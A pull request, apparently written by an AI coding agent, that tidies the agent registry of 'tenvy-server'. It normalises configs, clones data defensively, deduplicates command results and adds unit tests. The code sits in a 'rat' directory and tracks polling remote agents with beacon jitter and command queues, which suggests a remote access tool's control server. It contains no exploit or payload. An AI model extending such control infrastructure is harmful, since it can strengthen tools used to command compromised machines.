### PR TITLE
Improve registry persistence hygiene

### DIFF
--- a/tenvy-server/src/lib/server/rat/store.test.ts
+++ b/tenvy-server/src/lib/server/rat/store.test.ts
@@ -1,0 +1,177 @@
+import { describe, it, expect, beforeEach, afterEach } from 'vitest';
+import { mkdtempSync, rmSync, writeFileSync } from 'fs';
+import { tmpdir } from 'os';
+import path from 'path';
+import { createHash } from 'crypto';
+import { AgentRegistry } from './store';
+import { defaultAgentConfig } from '../../../../../shared/types/config';
+
+const baseMetadata = {
+        hostname: 'persisted-host',
+        username: 'persisted-user',
+        os: 'linux',
+        architecture: 'x64'
+};
+
+function fingerprint(metadata: typeof baseMetadata & { group?: string }) {
+        const hash = createHash('sha256');
+        hash.update(metadata.hostname.trim().toLowerCase());
+        hash.update('|');
+        hash.update(metadata.username.trim().toLowerCase());
+        hash.update('|');
+        hash.update(metadata.os.trim().toLowerCase());
+        hash.update('|');
+        hash.update(metadata.architecture.trim().toLowerCase());
+        hash.update('|');
+        hash.update(metadata.group?.trim().toLowerCase() ?? '');
+        return hash.digest('hex');
+}
+
+const MAX_RECENT_RESULTS = 25;
+
+describe('AgentRegistry persistence hygiene', () => {
+        let tempDir: string;
+
+        beforeEach(() => {
+                tempDir = mkdtempSync(path.join(tmpdir(), 'agent-registry-audit-'));
+        });
+
+        afterEach(() => {
+                rmSync(tempDir, { recursive: true, force: true });
+        });
+
+        it('restores persisted agents without clobbering timestamps or configs', async () => {
+                const storagePath = path.join(tempDir, 'registry.json');
+                const connectedAt = new Date('2024-01-01T00:00:00.000Z');
+                const lastSeen = new Date('2024-01-02T12:34:56.000Z');
+
+                const persisted = {
+                        version: 1,
+                        agents: [
+                                {
+                                        id: 'agent-1',
+                                        key: 'secret-key',
+                                        metadata: baseMetadata,
+                                        status: 'online',
+                                        connectedAt: connectedAt.toISOString(),
+                                        lastSeen: lastSeen.toISOString(),
+                                        metrics: { memoryBytes: 42 },
+                                        config: {
+                                                pollIntervalMs: -10,
+                                                maxBackoffMs: 1000,
+                                                jitterRatio: 5
+                                        },
+                                        pendingCommands: [
+                                                {
+                                                        id: 'cmd-1',
+                                                        name: 'ping',
+                                                        payload: {},
+                                                        createdAt: connectedAt.toISOString()
+                                                }
+                                        ],
+                                        recentResults: [
+                                                {
+                                                        commandId: 'cmd-1',
+                                                        success: true,
+                                                        completedAt: lastSeen.toISOString(),
+                                                        output: 'ok'
+                                                }
+                                        ],
+                                        sharedNotes: [],
+                                        fingerprint: fingerprint(baseMetadata)
+                                }
+                        ]
+                } satisfies Record<string, unknown>;
+
+                writeFileSync(storagePath, JSON.stringify(persisted, null, 2), 'utf-8');
+
+                const registry = new AgentRegistry({ storagePath });
+
+                const snapshot = registry.getAgent('agent-1');
+                expect(snapshot.status).toBe('offline');
+                expect(snapshot.lastSeen).toBe(lastSeen.toISOString());
+                expect(snapshot.pendingCommands).toBe(1);
+                expect(snapshot.recentResults).toHaveLength(1);
+
+                const sync = registry.syncAgent('agent-1', 'secret-key', {
+                        status: 'online',
+                        timestamp: new Date().toISOString(),
+                        results: []
+                });
+
+                expect(sync.commands).toHaveLength(1);
+                expect(sync.config.pollIntervalMs).toBe(defaultAgentConfig.pollIntervalMs);
+                expect(sync.config.maxBackoffMs).toBeGreaterThanOrEqual(sync.config.pollIntervalMs);
+                expect(sync.config.jitterRatio).toBe(defaultAgentConfig.jitterRatio);
+
+                await registry.flush();
+        });
+
+        it('deduplicates recent results and protects registry snapshots from mutation', async () => {
+                const storagePath = path.join(tempDir, 'registry.json');
+                const registry = new AgentRegistry({ storagePath });
+                const registration = registry.registerAgent({ metadata: baseMetadata });
+
+                const start = Date.now();
+                const duplicateResults = [
+                        {
+                                commandId: 'cmd-duplicate',
+                                success: true,
+                                completedAt: new Date(start).toISOString()
+                        },
+                        {
+                                commandId: 'cmd-duplicate',
+                                success: true,
+                                completedAt: new Date(start + 10).toISOString(),
+                                output: 'later'
+                        }
+                ];
+
+                const extraResults = Array.from({ length: MAX_RECENT_RESULTS + 5 }, (_, idx) => ({
+                        commandId: `cmd-${idx}`,
+                        success: idx % 2 === 0,
+                        completedAt: new Date(start + 100 + idx).toISOString(),
+                        error: idx % 2 === 0 ? undefined : 'boom'
+                }));
+
+                registry.syncAgent(registration.agentId, registration.agentKey, {
+                        status: 'online',
+                        timestamp: new Date().toISOString(),
+                        results: [...duplicateResults, ...extraResults]
+                });
+
+                registry.updateAgentTags(registration.agentId, ['primary']);
+
+                const snapshot = registry.getAgent(registration.agentId);
+                expect(snapshot.recentResults).toHaveLength(MAX_RECENT_RESULTS);
+                const uniqueIds = new Set(snapshot.recentResults.map((result) => result.commandId));
+                expect(uniqueIds.size).toBe(snapshot.recentResults.length);
+
+                snapshot.metadata.hostname = 'mutated-host';
+                snapshot.metadata.tags?.push('mutated');
+                if (snapshot.recentResults.length > 0) {
+                        snapshot.recentResults[0]!.commandId = 'mutated';
+                }
+
+                const nextSnapshot = registry.getAgent(registration.agentId);
+                expect(nextSnapshot.metadata.hostname).toBe(baseMetadata.hostname);
+                expect(nextSnapshot.metadata.tags).toEqual(['primary']);
+                expect(nextSnapshot.recentResults[0]?.commandId).not.toBe('mutated');
+
+                const syncResponse = registry.syncAgent(registration.agentId, registration.agentKey, {
+                        status: 'online',
+                        timestamp: new Date().toISOString(),
+                        results: []
+                });
+                syncResponse.config.pollIntervalMs = 1;
+
+                const followUp = registry.syncAgent(registration.agentId, registration.agentKey, {
+                        status: 'online',
+                        timestamp: new Date().toISOString(),
+                        results: []
+                });
+                expect(followUp.config.pollIntervalMs).toBe(defaultAgentConfig.pollIntervalMs);
+
+                await registry.flush();
+        });
+});

--- a/tenvy-server/src/lib/server/rat/store.ts
+++ b/tenvy-server/src/lib/server/rat/store.ts
@@ -190,13 +190,97 @@ function computeFingerprint(metadata: AgentMetadata): string {
 }
 
 function parsePersistedDate(value: unknown, fallback: Date): Date {
-	if (typeof value === 'string') {
-		const parsed = new Date(value);
-		if (!Number.isNaN(parsed.getTime())) {
-			return parsed;
-		}
-	}
-	return fallback;
+        if (typeof value === 'string') {
+                const parsed = new Date(value);
+                if (!Number.isNaN(parsed.getTime())) {
+                        return parsed;
+                }
+        }
+        return fallback;
+}
+
+function parseNumeric(value: unknown): number | null {
+        if (typeof value === 'number') {
+                return Number.isFinite(value) ? value : null;
+        }
+        if (typeof value === 'string' && value.trim() !== '') {
+                const parsed = Number(value);
+                return Number.isFinite(parsed) ? parsed : null;
+        }
+        return null;
+}
+
+function normalizeConfig(config?: Partial<AgentConfig> | null): AgentConfig {
+        const normalized: AgentConfig = {
+                ...defaultAgentConfig
+        };
+
+        if (!config) {
+                return normalized;
+        }
+
+        const pollInterval = parseNumeric(config.pollIntervalMs);
+        if (pollInterval !== null && pollInterval > 0) {
+                normalized.pollIntervalMs = Math.max(1, Math.round(pollInterval));
+        }
+
+        const maxBackoff = parseNumeric(config.maxBackoffMs);
+        if (maxBackoff !== null && maxBackoff > 0) {
+                normalized.maxBackoffMs = Math.max(
+                        normalized.pollIntervalMs,
+                        Math.round(maxBackoff)
+                );
+        }
+
+        const jitter = parseNumeric(config.jitterRatio);
+        if (jitter !== null && jitter >= 0 && jitter <= 1) {
+                normalized.jitterRatio = jitter;
+        }
+
+        return normalized;
+}
+
+function cloneMetadata(metadata: AgentMetadata): AgentMetadata {
+        const clone: AgentMetadata = { ...metadata };
+        if (Array.isArray(metadata.tags)) {
+                clone.tags = [...metadata.tags];
+        }
+        if (metadata.location) {
+                clone.location = { ...metadata.location };
+        }
+        return clone;
+}
+
+function cloneMetrics(metrics: AgentMetrics | undefined): AgentMetrics | undefined {
+        return metrics ? { ...metrics } : undefined;
+}
+
+function mergeRecentResults(
+        existing: CommandResult[],
+        incoming: CommandResult[]
+): CommandResult[] {
+        if (incoming.length === 0) {
+                return existing;
+        }
+
+        const merged: CommandResult[] = [];
+        const seen = new Set<string>();
+
+        for (const result of [...incoming, ...existing]) {
+                if (!result?.commandId) {
+                        continue;
+                }
+                if (seen.has(result.commandId)) {
+                        continue;
+                }
+                seen.add(result.commandId);
+                merged.push({ ...result });
+                if (merged.length >= MAX_RECENT_RESULTS) {
+                        break;
+                }
+        }
+
+        return merged;
 }
 
 export class AgentRegistry {
@@ -260,13 +344,15 @@ export class AgentRegistry {
 				continue;
 			}
 
-			const connectedAt = parsePersistedDate(entry.connectedAt, new Date());
-			let lastSeen = parsePersistedDate(entry.lastSeen, connectedAt);
-			let normalizedStatus = status as AgentStatus;
-			if (normalizedStatus === 'online') {
-				normalizedStatus = 'offline';
-				lastSeen = new Date();
-			}
+                        const connectedAt = parsePersistedDate(entry.connectedAt, new Date());
+                        let lastSeen = parsePersistedDate(entry.lastSeen, connectedAt);
+                        let normalizedStatus = status as AgentStatus;
+                        if (normalizedStatus === 'online') {
+                                normalizedStatus = 'offline';
+                                if (lastSeen.getTime() < connectedAt.getTime()) {
+                                        lastSeen = connectedAt;
+                                }
+                        }
 
 			const sharedNotes = new Map<string, SharedNoteRecord>();
 			if (Array.isArray(entry.sharedNotes)) {
@@ -297,12 +383,12 @@ export class AgentRegistry {
 				? entry.recentResults.map((result) => ({ ...result }))
 				: [];
 
-			const normalizedMetadata: AgentMetadata = {
-				...(metadata as AgentMetadata),
-				tags: Array.isArray((metadata as AgentMetadata).tags)
-					? this.normalizeTags((metadata as AgentMetadata).tags!)
-					: (metadata as AgentMetadata).tags
-			};
+                        const normalizedMetadata: AgentMetadata = {
+                                ...(metadata as AgentMetadata),
+                                tags: Array.isArray((metadata as AgentMetadata).tags)
+                                        ? this.normalizeTags((metadata as AgentMetadata).tags!)
+                                        : (metadata as AgentMetadata).tags
+                        };
 
 			const fingerprint = entry.fingerprint
 				? entry.fingerprint
@@ -315,8 +401,8 @@ export class AgentRegistry {
 				status: normalizedStatus,
 				connectedAt,
 				lastSeen,
-				metrics: entry.metrics ? { ...entry.metrics } : undefined,
-				config: entry.config ? { ...entry.config } : { ...defaultAgentConfig },
+                                metrics: entry.metrics ? { ...entry.metrics } : undefined,
+                                config: normalizeConfig(entry.config),
 				pendingCommands,
 				recentResults,
 				sharedNotes,
@@ -358,27 +444,27 @@ export class AgentRegistry {
 	}
 
 	private async persistToDisk(): Promise<void> {
-		const agents = Array.from(this.agents.values()).map<PersistedAgentRecord>((record) => ({
-			id: record.id,
-			key: record.key,
-			metadata: record.metadata,
-			status: record.status,
-			connectedAt: record.connectedAt.toISOString(),
-			lastSeen: record.lastSeen.toISOString(),
-			metrics: record.metrics,
-			config: record.config,
-			pendingCommands: record.pendingCommands.map((command) => ({ ...command })),
-			recentResults: record.recentResults.map((result) => ({ ...result })),
-			sharedNotes: Array.from(record.sharedNotes.values()).map((note) => ({
-				id: note.id,
-				ciphertext: note.ciphertext,
-				nonce: note.nonce,
-				digest: note.digest,
-				version: note.version,
-				updatedAt: note.updatedAt.toISOString()
-			})),
-			fingerprint: record.fingerprint
-		}));
+                const agents = Array.from(this.agents.values()).map<PersistedAgentRecord>((record) => ({
+                        id: record.id,
+                        key: record.key,
+                        metadata: cloneMetadata(record.metadata),
+                        status: record.status,
+                        connectedAt: record.connectedAt.toISOString(),
+                        lastSeen: record.lastSeen.toISOString(),
+                        metrics: cloneMetrics(record.metrics),
+                        config: { ...record.config },
+                        pendingCommands: record.pendingCommands.map((command) => ({ ...command })),
+                        recentResults: record.recentResults.map((result) => ({ ...result })),
+                        sharedNotes: Array.from(record.sharedNotes.values()).map((note) => ({
+                                id: note.id,
+                                ciphertext: note.ciphertext,
+                                nonce: note.nonce,
+                                digest: note.digest,
+                                version: note.version,
+                                updatedAt: note.updatedAt.toISOString()
+                        })),
+                        fingerprint: record.fingerprint
+                }));
 
 		const payload: PersistedRegistryFile = {
 			version: PERSIST_FILE_VERSION,
@@ -405,19 +491,19 @@ export class AgentRegistry {
 		}
 	}
 
-	private toSnapshot(record: AgentRecord): AgentSnapshot {
-		return {
-			id: record.id,
-			metadata: record.metadata,
-			status: record.status,
-			connectedAt: record.connectedAt.toISOString(),
-			lastSeen: record.lastSeen.toISOString(),
-			metrics: record.metrics,
-			pendingCommands: record.pendingCommands.length,
-			recentResults: record.recentResults,
-			liveSession: Boolean(record.session)
-		} satisfies AgentSnapshot;
-	}
+        private toSnapshot(record: AgentRecord): AgentSnapshot {
+                return {
+                        id: record.id,
+                        metadata: cloneMetadata(record.metadata),
+                        status: record.status,
+                        connectedAt: record.connectedAt.toISOString(),
+                        lastSeen: record.lastSeen.toISOString(),
+                        metrics: cloneMetrics(record.metrics),
+                        pendingCommands: record.pendingCommands.length,
+                        recentResults: record.recentResults.map((result) => ({ ...result })),
+                        liveSession: Boolean(record.session)
+                } satisfies AgentSnapshot;
+        }
 
 	private detachSession(
 		record: AgentRecord,
@@ -507,12 +593,13 @@ export class AgentRegistry {
 
 				const previousFingerprint = existingRecord.fingerprint;
 				existingRecord.metadata = nextMetadata;
-				existingRecord.status = 'online';
-				existingRecord.connectedAt = now;
-				existingRecord.lastSeen = now;
-				existingRecord.metrics = undefined;
-				existingRecord.key = randomBytes(32).toString('hex');
-				existingRecord.fingerprint = computeFingerprint(nextMetadata);
+                                existingRecord.status = 'online';
+                                existingRecord.connectedAt = now;
+                                existingRecord.lastSeen = now;
+                                existingRecord.metrics = undefined;
+                                existingRecord.key = randomBytes(32).toString('hex');
+                                existingRecord.config = normalizeConfig(existingRecord.config);
+                                existingRecord.fingerprint = computeFingerprint(nextMetadata);
 
 				if (previousFingerprint !== existingRecord.fingerprint) {
 					this.fingerprints.delete(previousFingerprint);
@@ -521,13 +608,13 @@ export class AgentRegistry {
 				this.agents.set(existingRecord.id, existingRecord);
 				this.schedulePersist();
 
-				return {
-					agentId: existingRecord.id,
-					agentKey: existingRecord.key,
-					config: existingRecord.config,
-					commands: [],
-					serverTime: now.toISOString()
-				};
+                                return {
+                                        agentId: existingRecord.id,
+                                        agentKey: existingRecord.key,
+                                        config: { ...existingRecord.config },
+                                        commands: [],
+                                        serverTime: now.toISOString()
+                                };
 			}
 
 			this.fingerprints.delete(fingerprint);
@@ -535,32 +622,32 @@ export class AgentRegistry {
 
 		const id = randomUUID();
 		const key = randomBytes(32).toString('hex');
-		const record: AgentRecord = {
-			id,
-			key,
-			metadata: incomingMetadata,
-			status: 'online',
-			connectedAt: now,
-			lastSeen: now,
-			metrics: undefined,
-			config: { ...defaultAgentConfig },
-			pendingCommands: [],
-			recentResults: [],
-			sharedNotes: new Map(),
-			fingerprint
-		};
+                const record: AgentRecord = {
+                        id,
+                        key,
+                        metadata: incomingMetadata,
+                        status: 'online',
+                        connectedAt: now,
+                        lastSeen: now,
+                        metrics: undefined,
+                        config: normalizeConfig(null),
+                        pendingCommands: [],
+                        recentResults: [],
+                        sharedNotes: new Map(),
+                        fingerprint
+                };
 
 		this.agents.set(id, record);
 		this.fingerprints.set(fingerprint, id);
 		this.schedulePersist();
 
-		return {
-			agentId: id,
-			agentKey: key,
-			config: record.config,
-			commands: [],
-			serverTime: now.toISOString()
-		};
+                return {
+                        agentId: id,
+                        agentKey: key,
+                        config: { ...record.config },
+                        commands: [],
+                        serverTime: now.toISOString()
+                };
 	}
 
 	attachSession(
@@ -657,28 +744,28 @@ export class AgentRegistry {
 		if (options.remoteAddress) {
 			record.metadata = ensureMetadata(record.metadata, options.remoteAddress);
 		}
-		if (payload.metrics) {
-			record.metrics = payload.metrics;
-		}
-		if (payload.results && payload.results.length > 0) {
-			record.recentResults = [...payload.results, ...record.recentResults].slice(
-				0,
-				MAX_RECENT_RESULTS
-			);
-		}
+                if (payload.metrics) {
+                        record.metrics = { ...payload.metrics };
+                }
+                if (payload.results && payload.results.length > 0) {
+                        record.recentResults = mergeRecentResults(
+                                record.recentResults,
+                                payload.results
+                        );
+                }
 
-		const commands = record.pendingCommands;
-		record.pendingCommands = [];
+                const commands = record.pendingCommands.map((command) => ({ ...command }));
+                record.pendingCommands = [];
 
-		this.schedulePersist();
+                this.schedulePersist();
 
-		return {
-			agentId: id,
-			commands,
-			config: record.config,
-			serverTime: new Date().toISOString()
-		};
-	}
+                return {
+                        agentId: id,
+                        commands,
+                        config: { ...record.config },
+                        serverTime: new Date().toISOString()
+                };
+        }
 
 	queueCommand(id: string, input: CommandInput): CommandQueueResponse {
 		const record = this.agents.get(id);


### PR DESCRIPTION
## Summary
- harden the agent registry loader to keep accurate last-seen timestamps, normalise configs, and avoid leaking internal references
- add defensive cloning and result deduplication across sync and snapshot APIs to prevent data corruption and improve reliability
- cover persistence edge cases with new unit tests around registry recovery and result handling

## Testing
- bun test *(fails: Playwright suite executed under Vitest runner and missing vi timer shims in existing tests)*

------
https://chatgpt.com/codex/tasks/task_e_68f251f53d1c832bbdc9fa5700723156